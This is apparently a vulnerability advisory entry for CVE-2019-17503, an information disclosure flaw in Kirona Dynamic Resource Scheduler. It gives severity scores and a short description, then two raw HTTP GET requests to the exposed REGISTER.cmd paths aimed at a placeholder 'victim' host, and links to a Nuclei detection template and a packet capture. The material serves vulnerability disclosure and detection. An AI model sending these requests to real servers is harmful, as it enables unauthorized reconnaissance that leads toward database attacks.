| Title | Kirona Dynamic Resource Scheduler - Information Disclosure |
|---|---|
| Author | LogicalHunter |
| Severity | Medium |
| Impact | Unauthenticated attackers can access sensitive information including database version, table names, and column names through exposed SQL queries, facilitating further SQL injection or database attacks. |
| Remediation | Apply the latest patch or update provided by the vendor to fix the information disclosure vulnerability. |
| CVSS Score | 5.3 |
| EPSS Score | 0.9022 |
| CVE ID | CVE-2019-17503 |
| CWE ID | CWE-425 |
| Tags | cve cve2019 exposure edb packetstorm kirona vkev vuln |
Kirona Dynamic Resource Scheduler is susceptible to information disclosure. An unauthenticated user can directly access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd), which contains sensitive information with exposed SQL queries, such as database version, table name, and column name.
GET /osm/REGISTER.cmd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.7
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /osm_tiles/REGISTER.cmd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17503.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-17503.pcap
N/AN/A